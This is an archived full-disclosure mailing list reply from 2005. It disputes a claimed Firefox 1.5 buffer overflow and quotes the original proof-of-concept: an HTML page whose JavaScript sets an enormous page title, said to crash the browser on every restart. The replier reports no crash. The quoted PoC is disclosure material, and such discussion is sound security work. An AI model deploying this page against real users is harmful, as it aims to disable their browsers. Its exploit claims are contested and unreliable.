[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] re: Firefox 1.5 buffer overflow (poc)
From:       "ad () heapoverflow ! com" <ad () heapoverflow ! com>
Date:       2005-12-08 13:37:42
Message-ID: 43983726.9060804 () heapoverflow ! com
[Download RAW message or body]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

nor a fake , nor you really dont know what is a buffer overflow, but for
sure here on my firefox 1.5 EN, the client is much longuer to load to
the next boot but it reloads fine without exceptions and there is
nothing about a security bug here...


><!-- Firefox 1.5 buffer overflow
>
>Basically firefox logs all kinda of URL data in it's history.dat file,
>this little script will set a really large topic and Firefox will then
>save that topic into it's history.dat.. The next time that firefox is
>opened, it will instantly crash due to a buffer overflow -- this will
>happen everytime until you manually delete the history.dat file -- >which
>most users won't figure out.
>
>this proof of concept will only prevent someone from reopening
>their browser after being exploited. DoS if you will. however, code
>execution is possible with some modifcations.
>
>Tested with Firefox 1.5 on Windows XP SP2.
>
>ZIPLOCK <sickbeatz@gmail.com>
>
>-->
><html><head><title>heh</title><script type="text/javascript">
>function ex() {
>	var buffer = "";
>	for (var i = 0; i < 5000; i++) {
>		buffer += "A";
>	}
>	var buffer2 = buffer;
>	for (i = 0; i < 500; i++) {
>		buffer2 += buffer;
>	}
>	document.title = buffer2;
>}
></script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
></a></body></html>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+
4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX
Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v
DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m
/Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE
crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22
cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo
pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3
5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi
AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw
2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb
IFxjTMn8Sc0=
=SX09
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic